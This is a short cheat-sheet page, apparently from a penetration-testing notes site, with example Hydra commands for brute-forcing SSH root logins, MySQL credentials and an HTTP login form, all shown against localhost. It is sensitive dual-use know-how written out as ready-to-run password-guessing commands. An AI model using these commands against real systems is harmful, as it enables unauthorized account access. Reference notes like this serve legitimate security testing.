+++
title = "Hydra"
description = ""
categories = []
tags = []
weight = 100
+++

## Hydra

> A very fast network logon cracker which support many different services

```bash
# try ssh bruteforce of user root, exit after first found (`-f`)
hydra -f -l root -P rockyou.txt ssh://127.0.0.1

# be verbose, output debugging, use 4 threads, enable extra checks (nsr)
hydra -v -d -t4 -f -e nsr -l root -P rockyou.txt ssh://127.0.0.1

# use file inputs for username and password, show creds for each attempt (`-V`)
hydra -V -f -L usernames.txt -p passwords.txt ssh://127.0.0.1

# mysql bruteforce using input file listing `username:password` per line
hydra -C credentials.txt mysql://127.0.0.1

# html form brute for (see also `wfuzz` tool)
hydra http-form-post "/login.php:user=^USER^&pass=^PASS^:Bad login" \
    -L usernames.txt \
    -P passwords.txt \
    -t 10 \
    -w 30 \
    -o output.log \
    http://127.0.0.1

```
